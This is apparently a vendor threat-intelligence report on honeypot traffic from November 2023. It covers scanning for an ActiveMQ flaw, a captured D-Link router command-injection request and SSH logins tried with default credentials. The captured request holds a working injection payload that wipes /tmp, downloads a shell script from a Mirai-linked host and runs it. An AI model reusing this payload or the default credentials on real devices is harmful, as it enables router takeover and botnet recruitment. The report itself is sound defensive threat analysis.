Our selection of alerts on honeypots: report 21 – November 2023

The following report consists of TEHTRIS observations on our worldwide honeypots network to provide you with information on what is going on the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adequately adjust the cybersecurity posture.

Check out our previous report here.

Follow-up of CVE-2023-46604 exploit attempts

Surge monitored in the previous report (n°20)

Since our last report, we monitored a global increase in exploit attempts of targeting port 61616/TCP, which is ActiveMQ’s default port.

The CVE-2023-46604 (CVSSv3: 9.8), which refers to a remote code execution in Apache ActiveMQ, was disclosed on October 24th. It is now mentioned in CISA’s known exploited vulnerabilities catalog since the 2nd of November.

On our worldwide honeypot network, we monitored a major increase in targeting this specific port since a proof of concept (PoC) was publicly disclosed on Github on 27th of October. The famous IT and cyber media Bleeping Computer also published an article on the 1st of November helping spreading the information accross the globe.

More than 700 unique IP addresses targeted this port these past two weeks. They are mostly hosted in the US (77%), in China (8%), in Bulgaria (4%), in Russia (3%) and in Canada (2%). Compared to last month, European honeypots (18%) are now the main victim of this threat instead of Singapore (respectively amouting for 18% and 14% of all hits, compared to 12% and 17% previously). They are followed by honeypots hosted in Indonesia (14%), in the UAE (8%) and in Hong-Kong (5%).

This phenomenon illustrates how the publication of a vulnerability can shape what is seen in the cyberspace in just a few days all around the world.

Updated top 10 IoCs – all flaged as malicious by VirusTotal community:

🇺🇸 US IP addresses hosted by AS 63949 (Akamai Connected Cloud)

  • 198.74.50[.]114
  • 45.33.78[.]70
  • 139.144.235[.]132
  • 143.42.1[.]53
  • 139.144.239[.]78
  • 170.187.165[.]139 – already in the top 10 in October

🇺🇸 US IP addresses hosted by AS 399045 (DEDIOUTLET-NETWORKS)

  • 68.69.186[.]14

🇨🇳 Chinese IP address hosted by AS 58461 (CT-HangZhou-IDC)

  • 183.136.225[.]9 – already in the top 10 in October

🇧🇬 BG IP address hosted by AS 394711 (LIMENET)

  • 91.92.248[.]140

🇷🇺 RU IP address hosted by AS 12389 (Rostelecom)

  • 81.177.125[.]9

The CVE-2021-45382 (CVSSv3: 9.8) refers to a remote command execution existance in D-Link routers via the DDNS function in ncc2 binary file. The explanations provided in this GitHub clearly illustrate the lack of control over the entries made by users on the ddnshostname and ddnusername variables.

On the 10th of November, the IP address 120.63.180[.]123 (hosted in India by AS 17813 Mahanagar Telephone Nigam Limited) targeted one of our European honeypot hosted in Italia on port TCP/80.

This IP address is flagged by VirusTotal community for being malicious.

Our honeypot captured the following packet which point out the parameters mentioned above:

POST /ddns_check.ccp HTTP/1.1

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest

Content-Length: 300 Cookie: hasLogin=1

Connection: close ccp_act=doCheck&ddnsHostName=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.180.48[.]100/l.sh;${IFS}sh${IFS}l.sh;&ddnsUsername=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.180.48[.]100/l.sh;${IFS}sh${IFS}l.sh;&ddnsPassword=123123123

The C2 address mentioned in bold inside the request is known by VirusTotal community for performing malicious activities related to Mirai botnet. The last part of the packet is a wget request for downloading the file 1.sh.

This CVE is mentioned in the CISA’s known exploited vulnerabilities catalog since April 2022 for being exploited in the wild. The impacted routers have reached End of Life (“EOL”) and as such, this issue will not be patched. TEHTRIS recommend to upgrade impacted hardware as soon as possible.

Focus on SSH connection attempts with admin/1q2w3e

Almost 40 unique IP addresses attempted to connect on SSH services included on our honeypots using the following credentials:

Login : admin

Password : 1q2w3e

These credentials turn out to be the default credentials to ABP framework which offers an architecture to build enterprise software solutions.

Geographical repartition of victim honeypots

Top 10 IoCs – all known from VirusTotal community:


🇨🇳 China

  • 183.237.47[.]139
  • 49.234.53[.]247
  • 43.138.29[.]247
  • 43.138.223[.]128

🇰🇷 Korea

  • 61.80.237[.]204

🇸🇬 Singapore

  • 43.156.237[.]23


🇵🇹 Portugal

  • 85.240.175[.]100

🇫🇷 France

  • 46.105.158[.]45


🇺🇸 United-States

  • 72.240.125[.]133

🇵🇪 Peru

  • 45.71.33[.]220

Multiple exploit attempts by an Indian threat actor

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

    Focus on two CVE of 2018 still actively exploited

    Want to learn more on this subject?

    More insights on this research issued from the alerts on our worldwide honeypots network.

    Subscribe to our bi-monthly threat intelligence newsletter

      Information remain TEHTRIS sole property and reproduction is forbidden

      TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

      No warranty and liability

      TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.